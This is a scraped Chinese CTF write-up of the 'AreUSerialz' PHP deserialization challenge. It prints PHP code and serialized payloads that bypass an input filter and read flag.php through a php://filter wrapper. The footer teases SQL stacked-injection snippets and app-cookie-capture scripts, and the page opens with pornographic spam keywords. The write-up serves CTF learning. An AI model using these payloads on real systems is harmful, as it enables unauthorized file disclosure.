国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz

2年前作者：sleepywin分類：Toy博客閱讀(10)違法舉報

這篇具有很好參考價值的文章主要介紹了web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

題目

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

點進題目發(fā)現(xiàn)

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

需要進行代碼審計

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

這里有__destruct()函數(shù)，在對象銷毀時自動調(diào)用，根據(jù)$op屬性的值進行一些操作，并重置屬性的值，后再次調(diào)用process()方法，同時該函數(shù)會根據(jù)op變量值的不同，會相應(yīng)調(diào)用讀寫函數(shù)

即op=="1",進入write方法，op=="2"進入read方法進行處理

總體解題思路為，構(gòu)造反序列化給str變量，當(dāng)主函數(shù)進行反序列化時，調(diào)用了FileHandler類，讀取flag.php

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

接收到名為str的get參數(shù)，參數(shù)會被反序列化，并創(chuàng)建一個對象，在反序列化之前，會使用is_valid()函數(shù)對字符串進行驗證，傳入的string要是可見字符串a(chǎn)scii值為32-125

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

這里要構(gòu)造op=2，要聯(lián)想至上面的destruct方法，當(dāng)op=2時會自動執(zhí)行魔術(shù)方法_destruct，繞過if($this->op==="2")這條強類型判斷，2===“2”為假（左邊為數(shù)字int，右邊為字符串string），會執(zhí)行process方法，2==“2”為真，執(zhí)行read方法，讀取文件

注意成員變量是protected屬性，會在變名前加%00*%00，注意is_valid方法，%00的ascii碼為0，無法通過檢查，需要繞過

繞過方法：

1.php7.1+版本對屬性類型不敏感，本地序列化的時候?qū)傩愿臑閜ublic進行繞過即可

2.php的序列化字符串中只要把其中的s改成大寫的S，后面的字符串就可以用十六進制表示

php偽協(xié)議進行讀取

構(gòu)造payload

<?php

class FileHandler
{

    public $op = 2;
    public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
//偽協(xié)議轉(zhuǎn)化為base64讀取，php代碼無法直接讀取
    public $content;

}
$A=new FileHandler();
$B=serialize($A);
echo $B;

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

直接傳參得不到flag

反序列化完的結(jié)果看似沒有包含0，但實際上有ascii碼為0的

這里需要對$B進行兩次替換操作

使用?str_replace()?函數(shù)將字符串中的空字符（ASCII 值為 0）替換為?\00。
使用?str_replace()?函數(shù)將字符串中的 "s:" 替換為 "S:"。

構(gòu)造payload

<?php

class FileHandler
{

    protected $op = 2;
    protected $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
    protected $content;

}
$A=new FileHandler();
$B=serialize($A);
$B = str_replace(chr(0), '\00', $B);
$B = str_replace('s:', 'S:', $B);
echo $B;

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:57:"php://filter/read=convert.base64-encode/resource=flag.php";S:10:"\00*\00content";N;}

傳參可得

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

查看源碼

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

解碼可得

web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz,BUUCTF-WEB,網(wǎng)絡(luò)安全,web

參考文章鏈接：

https://www.cnblogs.com/akger/p/15137082.html

第二屆網(wǎng)鼎杯（青龍組）部分wp-安全客 - 安全資訊平臺文章來源地址http://www.zghlxwxcb.cn/news/detail-718854.html

到了這里，關(guān)于web：[網(wǎng)鼎杯 2020 青龍組]AreUSerialz的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符，請點擊違法舉報進行投訴反饋，一經(jīng)查實，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費用

中國頂級CTF競賽網(wǎng)絡(luò)安全大賽--2022網(wǎng)鼎杯re2解題思路
PEID查不出來，用了die，顯示是UPX3.96的殼，用了脫殼機，脫不了，只能手動脫殼，拖入x64dbg，F(xiàn)9運行到程序領(lǐng)空，很明顯的特征，push：無腦使用ESP定律大法，對ESP下硬件訪問斷點： F9運行，在pop處停下： F4運行到下面第一個jmp，F(xiàn)8，進去又是一個jmp，繼續(xù)F8，到達(dá)OEP：使用x
2023年04月22日
瀏覽(22)
[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看
首先我們看到賬號密碼有提示了我們bp爆破一下我首先對數(shù)字爆破因為全字符的話太多了爆出來了哦所以賬號密碼也出來了沒有什么用啊掃一下吧有g(shù)it 那泄露看看真有原本的githack壞了 mirrors / BugScanTeam / GitHack · GitCode 重新下了一個需要下載后里面存在 .git文件夾然后
2024年02月06日
瀏覽(22)
BUUCTF-WEB2
1.啟動靶機 2.尋找注入點和注入方法隨便輸入一個字母，沒有回顯隨便輸入一個數(shù)字，發(fā)現(xiàn)有回顯，并且回顯結(jié)果一樣 3.堆疊注入 1; show databases;???? #查看數(shù)據(jù)庫 1; show tables;??? #查看數(shù)據(jù)表里面有個flag 1;set sql_mode=PIPES_AS_CONCAT;select 1 1; ：這個部分是一個 SQL 查詢的結(jié)束符
2024年04月28日
瀏覽(22)
BUUCTF-WEB-刷題記錄
代碼理解進入主頁后發(fā)現(xiàn)是代碼審計 / 解題總的來說關(guān)注三行就夠了,連起來可以這樣理解: 創(chuàng)建一個目錄名為orange+右上角的訪客ip的MD5加密值 d a t a 接受 s h e l l 命令最后寫入目錄名 / data接受shell命令最后寫入目錄名/ d a t a 接受 s h e ll 命令最后寫入目錄名 / filename文件名里
2024年02月07日
瀏覽(15)
青龍面板必裝依賴以及青龍各種問題
1、一鍵安裝所有依賴進入青龍面板復(fù)制下面命令執(zhí)行，等待執(zhí)行完畢即可！注意你的青龍目錄這里的目錄為ql 1.一般出現(xiàn)這種錯誤：(缺依賴) Error: Cannot find module ‘xx’ 解決方法：docker exec -it 容器名 pnpm install xx 2.一般出現(xiàn)這種錯誤：(缺文件) Error: Cannot find module ‘./xx’ 解決
2024年02月05日
瀏覽(28)
青龍面板-美團紅包
美團外賣領(lǐng)紅包環(huán)境變量，名稱：MT_TOKEN，值：xxxxx 關(guān)于MT_TOKEN獲取方法，手機瀏覽器打開http://i.meituan.com 登錄后，抓包查看請求頭Cookie 找到http://i.meituan.com ?然后找到token的值定時規(guī)則0 11,14,17,21,0,1,2,3 * * * ? ?附腳本
2024年02月12日
瀏覽(23)
青龍面板7貓
來自友友投稿 1.拉庫 ? 2，抓包 ? ?根據(jù)友友提示，記得自己手動刷一下，這樣穩(wěn)定一點 ? ?下面是搭建教程首先介紹一下什么是青龍面板：青龍面板是電腦上服務(wù)器的界面。 ? 接下來向大家介紹一下青龍面板的搭建方法。 1，我們需要購買一臺服務(wù)器，這里我們就介紹
2023年04月16日
瀏覽(27)
安卓安裝termux運行青龍
首先需要安裝好ZeroTermux應(yīng)用執(zhí)行以下命令 2.1 termux-setup-storage termux訪問外部存儲權(quán)限 2.2 ls -a 列出當(dāng)前目錄的列表信息把你下載好的青龍面板恢復(fù)包(.tar.gz)放在手機內(nèi)部存儲目錄中的xinhao/data路徑下回到ZeroTermux終端，開始恢復(fù)容器，名字任意導(dǎo)入青龍恢復(fù)包：側(cè)滑-備份
2024年03月08日
瀏覽(27)
青龍面板番茄小說
APP：番茄免費小說拉庫完成：簽到、簽到翻倍、開寶箱、寶箱翻倍、看廣告視頻、領(lǐng)取三餐獎勵、三餐獎勵翻倍、領(lǐng)取閱讀時長獎勵變量名：fqmfxsck 安卓抓包：https://i-hl.snssdk.com/luckycat開頭的，在cookie里面找到sessionid，在url里面找到iid和device_id，將sessionid#iid#device_id填入變量
2023年04月18日
瀏覽(49)
青龍面板搭建教程
好的，以下是使用云服務(wù)器搭建青龍面板的詳細(xì)教程：步驟一：購買云服務(wù)器首先您需要前往云服務(wù)器的銷售網(wǎng)站購買一臺云服務(wù)器，在選擇云服務(wù)器時，根據(jù)您的需求選擇不同的配置方案。如果您只需要搭建一個小型的青龍面板，可以選擇更為經(jīng)濟實惠的配置方案。步驟
2024年02月15日
瀏覽(26)